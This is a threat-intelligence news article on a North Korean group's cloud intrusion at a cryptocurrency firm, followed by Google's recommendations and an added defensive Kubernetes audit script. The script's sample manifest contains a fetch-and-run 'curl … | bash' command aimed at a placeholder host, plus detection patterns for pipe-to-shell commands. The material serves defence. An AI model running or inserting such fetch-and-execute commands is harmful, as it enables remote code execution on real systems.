UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device

Published: March 9, 2026 at 10:50 AM EDT

Source: The Hacker News

Ravie Lakshmanan | Mar 09, 2026 | DevOps / Threat Intelligence


The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud‑compromise campaign that targeted a cryptocurrency organization in 2025, stealing millions of dollars in crypto assets.

The activity has been attributed with moderate confidence to the state‑sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor — see the original report on The Hacker News.

“This incident is notable for its blend of social engineering, exploitation of personal‑to‑corporate device peer‑to‑peer data (P2P) transfer mechanisms, workflows, and eventual pivot to the cloud to employ living‑off‑the‑cloud (LOTC) techniques,” Google noted in its H1 2026 Cloud Threat Horizons Report (PDF shared with The Hacker News).

Attack Overview

Upon gaining access to the cloud environment, the attackers abused legitimate DevOps workflows to:

  • Harvest credentials.
  • Break out of container sandboxes.
  • Tamper with Cloud SQL databases to facilitate the cryptocurrency theft.


The attack chain, as described by Google Cloud, progressed as follows:

  1. Initial social‑engineering – The threat actors lured a developer into downloading an archive file purportedly part of an open‑source collaboration.
  2. Device‑to‑device transfer – The developer moved the archive to a corporate workstation via AirDrop.
  3. IDE execution – Using an AI‑assisted Integrated Development Environment (IDE), the victim opened the archive, executing malicious Python code that spawned a binary masquerading as the kubectl command‑line tool.
  4. Backdoor establishment – The binary contacted an attacker‑controlled domain, providing a foothold on the corporate machine and enabling pivoting into the Google Cloud environment with likely authenticated sessions and harvested credentials.
  5. Reconnaissance – The attackers gathered information about services and projects within the cloud tenant.


Further Cloud‑Side Activities

  • Bastion host discovery – The adversary located a bastion host and altered its multi‑factor authentication (MFA) policy to gain access, then performed deeper reconnaissance, including pod navigation within Kubernetes.
  • Living‑off‑the‑cloud (LotC) persistence – Deployment configurations were modified to execute a Bash command automatically on new pod creation; the command downloaded an additional backdoor.

Notable steps (bullet‑point summary)

  • Kubernetes resources tied to the victim’s CI/CD platform were altered to inject commands that logged service‑account tokens.
  • A high‑privilege CI/CD service‑account token was harvested, enabling privilege escalation and lateral movement toward a pod handling network policies and load balancing.
  • The stolen token authenticated to a privileged infrastructure pod, allowing container escape and deployment of a persistent backdoor.
  • Additional reconnaissance targeted a workload managing customer data (user identities, account security, cryptocurrency wallet information).
  • Static database credentials stored insecurely in the pod’s environment variables were extracted.
  • Those credentials were used via Cloud SQL Auth Proxy to access the production database and execute SQL statements that reset passwords and updated MFA seeds for high‑value accounts.
  • Compromised accounts were leveraged to withdraw several million dollars in digital assets.

The above analysis is based on information disclosed by Google Cloud and reported by The Hacker News.


The incident “highlights the critical risks posed by the personal‑to‑corporate P2P data transfer methods and other data bridges, privileged container modes, and the unsecured handling of secrets in a cloud environment,” Google said. “Organizations should adopt a defense‑in‑depth strategy that rigorously validates identity, restricts data transfer on endpoints, and enforces strict isolation within cloud runtime environments to limit the blast radius of an intrusion event.”

Recommendations

  • Implement context‑aware access and phishing‑resistant MFA.
  • Ensure only trusted images are deployed.
  • Isolate compromised nodes from establishing connectivity with external hosts.
  • Monitor for unexpected container processes.
  • Adopt robust secrets management.
  • Enforce policies to disable or restrict peer‑to‑peer file sharing using AirDrop or Bluetooth and mounting of unmanaged external media on corporate devices.
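A defender‑side check for three of the weaknesses Google calls out (privileged container modes, static secrets held in pod environment variables, and deployment configurations that fetch and execute remote content when a pod starts), written as an added example that is not part of the report or of any Google tooling. The Deployment manifest, image name and URL below are constructed for illustration.

```python
import re

# Constructed sample Deployment (all names and values invented) showing the
# three weak settings: privileged mode, a literal DB password in env, and a
# postStart hook that downloads and runs remote content.
SAMPLE_DEPLOYMENT = {
    "kind": "Deployment",
    "metadata": {"name": "wallet-api"},
    "spec": {"template": {"spec": {"containers": [{
        "name": "api",
        "image": "registry.example.internal/wallet-api:1.4.2",
        "securityContext": {"privileged": True},
        "env": [
            {"name": "DB_PASSWORD", "value": "static-example-pw"},
            {"name": "DB_USER",
             "valueFrom": {"secretKeyRef": {"name": "db", "key": "user"}}},
        ],
        "lifecycle": {"postStart": {"exec": {"command": [
            "/bin/sh", "-c", "curl -s http://203.0.113.10/x | bash"]}}},
    }]}}},
}

SECRET_NAME = re.compile(r"PASS|SECRET|TOKEN|KEY|CRED", re.I)
# Pipe-to-shell or decode-then-shell patterns in start-up commands
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|base64\s+-d.*\|\s*(ba)?sh\b")

def _startup_commands(container):
    """Yield every string a container runs at start: command, args, postStart hook."""
    for field in ("command", "args"):
        yield from container.get(field, [])
    hook = container.get("lifecycle", {}).get("postStart", {}).get("exec", {})
    yield from hook.get("command", [])

def audit_deployment(manifest):
    """Return (container_name, finding) tuples for one Deployment manifest."""
    findings = []
    pod_spec = manifest.get("spec", {}).get("template", {}).get("spec", {})
    for c in pod_spec.get("containers", []) + pod_spec.get("initContainers", []):
        name = c.get("name", "?")
        if c.get("securityContext", {}).get("privileged"):
            findings.append((name, "privileged container"))
        for env in c.get("env", []):
            # A literal 'value' with a secret-looking name; secretKeyRef is acceptable
            if "value" in env and SECRET_NAME.search(env.get("name", "")):
                findings.append((name, f"static secret in env {env['name']}"))
        for cmd in _startup_commands(c):
            if FETCH_AND_RUN.search(cmd):
                findings.append((name, "start-up command fetches and executes remote content"))
    return findings
```

Running `audit_deployment` over manifests pulled with `kubectl get deploy -o json` (or over admission‑controller input) flags the same three conditions in real clusters; the secretKeyRef entry is deliberately left unflagged because that is the supported way to inject credentials.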
